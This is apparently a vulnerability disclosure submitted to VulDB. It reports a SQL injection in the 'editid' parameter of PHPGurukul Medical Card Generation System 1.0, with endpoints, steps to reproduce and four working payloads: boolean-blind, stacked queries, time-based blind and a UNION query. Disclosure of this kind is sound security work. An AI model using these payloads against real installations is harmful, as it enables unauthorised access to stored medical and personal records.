| 제목 | PHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injection |
|---|
| 설명 | I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing.
Details:
Affected URL/Endpoint: /mcgs/admin/changeimage.php?editid=1, /mcgs/admin/edit-card-detail.php?editid=1
Vulnerable Parameter: 'editid'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Sign in as admin.
2) Navigate to Managecard > Action 'Edit' > Edit Image
3) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request.
4) Input the payload to invoke the SQL injection.
---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 3139=3139
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
Please let me know if you need further information or a more detailed analysis. |
|---|
| 사용자 | Delvy (UID 74555) |
|---|
| 제출 | 2024. 10. 21. AM 05:00 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 10. 23. PM 01:05 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 281565 [PHPGurukul Medical Card Generation System 1.0 Managecard Edit Card Detail Page edit-card-detail.php editid SQL 주입] |
|---|
| 포인트들 | 17 |
|---|